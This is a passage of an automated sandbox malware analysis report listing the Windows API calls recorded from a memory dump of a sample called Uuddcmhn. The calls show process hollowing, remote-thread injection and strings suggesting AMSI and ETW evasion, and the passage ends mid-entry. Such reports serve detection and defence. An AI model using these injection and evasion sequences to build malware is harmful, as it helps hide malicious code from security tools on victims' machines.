                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: File$DeleteProcess$Virtual$Alloc$Handle$CloseCreateModule$AddressContextExecExitFreeLibraryMemoryNameObjectOpenProcProtectReadSectionSingleSleepSuspendThreadUnmapViewWait
                                                                • String ID: AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$GetEventLogInformation$Initialize$NotifyChangeEventLog$NtCreateFile$NtOpenFile$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$advapi32$iexpress$iexpress.exe$kernel32$ntdll$shell32
                                                                • API String ID: 1692551227-2165151845
                                                                • Opcode ID: 433c3dc48400b18127e24fef960a197feb1e5b1277c4e2433686579fa01b34af
                                                                • Instruction ID: ba0e1fe8697d27f9d797a8f96bc0060d5120d44d3c9b5eb9f625db1ebe53dd4b
                                                                • Opcode Fuzzy Hash: 433c3dc48400b18127e24fef960a197feb1e5b1277c4e2433686579fa01b34af
                                                                • Instruction Fuzzy Hash: 2EF20C3EA0111A8BDF21FB68DC80ADE73B6EF84300F1484E69109E7315DE74AE959F56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02885D28
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885D46
                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885D64
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02885D82
                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02885E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02885DCB
                                                                • RegQueryValueExA.ADVAPI32(?,02885F78,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02885E11,?,80000001), ref: 02885DE9
                                                                • RegCloseKey.ADVAPI32(?,02885E18,00000000,00000000,00000005,00000000,02885E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885E0B
                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02885E28
                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02885E35
                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02885E3B
                                                                • lstrlen.KERNEL32(00000000), ref: 02885E66
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02885EAD
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885EBD
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02885EE5
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885EF5
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885F1B
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                • API String ID: 1759228003-3917250287
                                                                • Opcode ID: f3551c483fb0094dab07f0931b2c72906d9cd233e068b6a25d591cf2ac3b953b
                                                                • Instruction ID: ead5cc0c037d4b5c2ad6fbfe397aef70c56e1af6e7ebe9552fe4a60beb6e95df
                                                                • Opcode Fuzzy Hash: f3551c483fb0094dab07f0931b2c72906d9cd233e068b6a25d591cf2ac3b953b
                                                                • Instruction Fuzzy Hash: 3651AB7DA4020D7EFB21E6E48C85FEF77ADDB04740F8101A1A608E6181EB789A458F61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 02894959
                                                                • GetThreadContext.KERNEL32(028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 0289497B
                                                                • ReadProcessMemory.KERNEL32(028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C), ref: 028949A3
                                                                • NtUnmapViewOfSection.NTDLL(028DD34C,7EF60310), ref: 028949C7
                                                                • VirtualAllocEx.KERNEL32(028DD34C,7EF60310,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 028949EF
                                                                • VirtualAllocEx.KERNEL32(028DD34C,00000000,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 02894A13
                                                                • WriteProcessMemory.KERNEL32(028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AD1
                                                                • SetThreadContext.KERNEL32(028DD350,028DD3A0,028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AF4
                                                                • ResumeThread.KERNEL32(028DD350,028DD350,028DD3A0,028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AFF
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ProcessThread$AllocContextMemoryVirtual$CreateReadResumeSectionUnmapViewWrite
                                                                • String ID:
                                                                • API String ID: 2875846476-0
                                                                • Opcode ID: c2d0f14e0e0180d0e31a24009f0181e5bd55293247d535567a5efebc161b9a92
                                                                • Instruction ID: 99a1791fba87009eb66d68a42603a9df7488f331e1b449c22466f1710d99b450
                                                                • Opcode Fuzzy Hash: c2d0f14e0e0180d0e31a24009f0181e5bd55293247d535567a5efebc161b9a92
                                                                • Instruction Fuzzy Hash: 42611CBEB82200AFE758EB6CDC81F1637EAB748704F498854F645DB381D274F8298B55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 02894959
                                                                • GetThreadContext.KERNEL32(028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 0289497B
                                                                • ReadProcessMemory.KERNEL32(028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C), ref: 028949A3
                                                                • NtUnmapViewOfSection.NTDLL(028DD34C,7EF60310), ref: 028949C7
                                                                • VirtualAllocEx.KERNEL32(028DD34C,7EF60310,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 028949EF
                                                                • VirtualAllocEx.KERNEL32(028DD34C,00000000,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 02894A13
                                                                • WriteProcessMemory.KERNEL32(028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AD1
                                                                • SetThreadContext.KERNEL32(028DD350,028DD3A0,028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AF4
                                                                • ResumeThread.KERNEL32(028DD350,028DD350,028DD3A0,028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AFF
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ProcessThread$AllocContextMemoryVirtual$CreateReadResumeSectionUnmapViewWrite
                                                                • String ID:
                                                                • API String ID: 2875846476-0
                                                                • Opcode ID: 0521b361addd2c1445717f834a05b8b6dbeaae493f51bc4e9e8e5e4992a22fc3
                                                                • Instruction ID: 547ab5526bd38080e86ecb17b5d6e5cfe132bf145152acd0a8473f353e0e2091
                                                                • Opcode Fuzzy Hash: 0521b361addd2c1445717f834a05b8b6dbeaae493f51bc4e9e8e5e4992a22fc3
                                                                • Instruction Fuzzy Hash: D3511CBEB82200AFE718EB6CDD81F1637EAB748704F488854F545DB381E674F8298B51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                APIs
                                                                • InternetOpenA.WININET(lVali,00000004,00000000,00000000,00000000), ref: 0289522C
                                                                • InternetOpenUrlA.WININET(028DDAA4,00000000,00000000,00000000,00000200,00000000), ref: 0289524F
                                                                • HttpQueryInfoA.WININET(028DDAA8,00000013,200,028DDCB4,028DDCB0), ref: 0289528E
                                                                • InternetCloseHandle.WININET(028DDAA8), ref: 028952D6
                                                                • InternetCloseHandle.WININET(028DDAA4), ref: 028952E1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuery
                                                                • String ID: 200$200$lVali
                                                                • API String ID: 3871184103-2774994813
                                                                • Opcode ID: 824630d53ee381470818bc93ffef1a291d76ed6c6c0cf8a0662a660eb2c01037
                                                                • Instruction ID: 743814de81252176ecc41a3374c5dfcdafd391ad1889e5ee597c141d8a2a58eb
                                                                • Opcode Fuzzy Hash: 824630d53ee381470818bc93ffef1a291d76ed6c6c0cf8a0662a660eb2c01037
                                                                • Instruction Fuzzy Hash: 6411887EB8A3006EFB50BBF9AC81B023399A704704F101C25B600DFBC4C6F8942C8B14
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 02881800
                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 02881816
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 02881B47
                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 02881B61
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateFileA.KERNEL32(028DD940,80000000,?,00000000,00000003,00000080,00000000,?,?,?,028836D5,02896CE7,ScanBuffer,0289AD5C,OpenSession,0289AD5C), ref: 02883677
                                                                • GetStdHandle.KERNEL32(000000F5,?,?,?,028836D5,02896CE7,ScanBuffer,0289AD5C,OpenSession,0289AD5C,ScanBuffer,0289AD5C,028DD8E0,ScanBuffer,0289AD5C,ScanString), ref: 02883697
                                                                • GetLastError.KERNEL32(000000F5,?,?,?,028836D5,02896CE7,ScanBuffer,0289AD5C,OpenSession,0289AD5C,ScanBuffer,0289AD5C,028DD8E0,ScanBuffer,0289AD5C,ScanString), ref: 028836AB
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorFileHandleLast
                                                                • String ID:
                                                                • API String ID: 1572049330-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0288CAB0: SetErrorMode.KERNEL32 ref: 0288CABA
                                                                  • Part of subcall function 0288CAB0: LoadLibraryA.KERNEL32(00000000,00000000,0288CB04,?,00000000,0288CB22), ref: 0288CAE9
                                                                • GetModuleHandleA.KERNEL32 ref: 02893725
                                                                • GetProcAddress.KERNEL32(028DD2F8,00000000), ref: 02893748
                                                                • FreeLibrary.KERNEL32(028DD2F8,00000000,00000000,02893792), ref: 02893772
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressErrorFreeHandleLoadModeModuleProc
                                                                • String ID:
                                                                • API String ID: 2211333376-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32 ref: 02893725
                                                                • GetProcAddress.KERNEL32(028DD2F8,00000000), ref: 02893748
                                                                • FreeLibrary.KERNEL32(028DD2F8,00000000,00000000,02893792), ref: 02893772
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID:
                                                                • API String ID: 4061214504-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • InternetCloseHandle.WININET(028DD4D0), ref: 02895A6F
                                                                • InternetCloseHandle.WININET(028DD4CC), ref: 02895A8F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleInternet
                                                                • String ID:
                                                                • API String ID: 1081599783-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 028833EE
                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 028833F5
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastRead
                                                                • String ID:
                                                                • API String ID: 1948546556-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 028833EE
                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 028833F5
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastRead
                                                                • String ID:
                                                                • API String ID: 1948546556-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SetErrorMode.KERNEL32 ref: 0288CABA
                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0288CB04,?,00000000,0288CB22), ref: 0288CAE9
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ErrorLibraryLoadMode
                                                                • String ID:
                                                                • API String ID: 2987862817-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SetErrorMode.KERNEL32 ref: 0288CABA
                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0288CB04,?,00000000,0288CB22), ref: 0288CAE9
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ErrorLibraryLoadMode
                                                                • String ID:
                                                                • API String ID: 2987862817-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(02A21B20,?,00000105), ref: 02885AC6
                                                                  • Part of subcall function 02885D0C: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02885D28
                                                                  • Part of subcall function 02885D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885D46
                                                                  • Part of subcall function 02885D0C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885D64
                                                                  • Part of subcall function 02885D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02885D82
                                                                  • Part of subcall function 02885D0C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02885E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02885DCB
                                                                  • Part of subcall function 02885D0C: RegQueryValueExA.ADVAPI32(?,02885F78,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02885E11,?,80000001), ref: 02885DE9
                                                                  • Part of subcall function 02885D0C: RegCloseKey.ADVAPI32(?,02885E18,00000000,00000000,00000005,00000000,02885E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885E0B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                • String ID:
                                                                • API String ID: 2796650324-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(00000000,?,0289752B,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C,ScanString,0289AD5C,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession), ref: 0288813F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • timeSetEvent.WINMM(?,00000000,0289B0C0), ref: 0289B0DC
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Eventtime
                                                                • String ID:
                                                                • API String ID: 2982266575-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SetErrorMode.KERNEL32(?,0288CB29), ref: 0288CB1C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 02881612
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028816D4
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02881734
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FreeVirtual
                                                                • String ID:
                                                                • API String ID: 1263568516-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(0A74C085,00000000,00000123,00001000,00000040,?,028CD33C,?,?,02894314,?,00000000,028943E7,?,028CD33C,?), ref: 02893E80
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,0A74C085,00000000,00000123,00001000,00000040,?,028CD33C,?,?,02894314,?,00000000,028943E7,?,028CD33C), ref: 02893EC9
                                                                • GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 02893ED6
                                                                • GetProcAddress.KERNEL32(00000000,ExitThread), ref: 02893EE5
                                                                • WriteProcessMemory.KERNEL32(0A74C085,00000000,?,00000123,?,?,00000000,00000000,ExitThread,00000000,LoadLibraryA,kernel32.dll,0A74C085,00000000,00000123,00001000), ref: 02893F0D
                                                                • CreateRemoteThread.KERNEL32(0A74C085,00000000,00000000,00000000,00000000,00000000,?), ref: 02893F21
                                                                • CloseHandle.KERNEL32(00000000,0A74C085,00000000,00000000,00000000,00000000,00000000,?,0A74C085,00000000,?,00000123,?,?,00000000,00000000), ref: 02893F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleProc$AllocCloseCreateMemoryModuleProcessRemoteThreadVirtualWrite
                                                                • String ID: ExitThread$LoadLibraryA$h$h$kernel32.dll
                                                                • API String ID: 3764795964-1073290800
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02885E28
                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02885E35
                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02885E3B
                                                                • lstrlen.KERNEL32(00000000), ref: 02885E66
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02885EAD
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885EBD
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02885EE5
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885EF5
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885F1B
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                • String ID: .
                                                                • API String ID: 1599918012-248832578
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 02893FF9
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00003000,00000040), ref: 0289400F
                                                                • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040,00000000,00000000,00008000,00000000,00000000,00003000,00000040), ref: 02894030
                                                                • WriteProcessMemory.KERNEL32(?,028DD31C,028DD31C,028DD320,028DD330,?,00000000,00000000,00003000,00000040,00000000,028940DA), ref: 02894092
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
